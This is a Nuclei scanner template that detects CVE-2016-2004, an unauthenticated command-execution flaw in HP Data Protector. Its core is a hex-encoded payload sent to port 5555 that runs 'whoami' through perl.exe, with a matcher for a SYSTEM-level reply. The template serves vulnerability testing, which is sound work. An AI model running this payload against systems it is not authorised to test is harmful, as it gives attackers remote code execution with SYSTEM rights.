nuclei-templates/cves/2016/CVE-2016-2004.yaml

36 lines
1.2 KiB
YAML

id: CVE-2016-2004
info:
name: HP Data Protector - Arbitrary Command Execution
author: pussycat0x
severity: critical
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
reference:
- https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
- http://www.kb.cert.org/vuls/id/267328
- https://www.exploit-db.com/exploits/39858/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-2004
cwe-id: CWE-306
tags: cve,cve2016,network,iot,hp,rce,edb
network:
- inputs:
- data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
type: hex
host:
- "{{Hostname}}"
- "{{Host}}:5555"
matchers:
- type: word
encoding: hex
words:
- "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# Enhanced by mp on 2022/05/10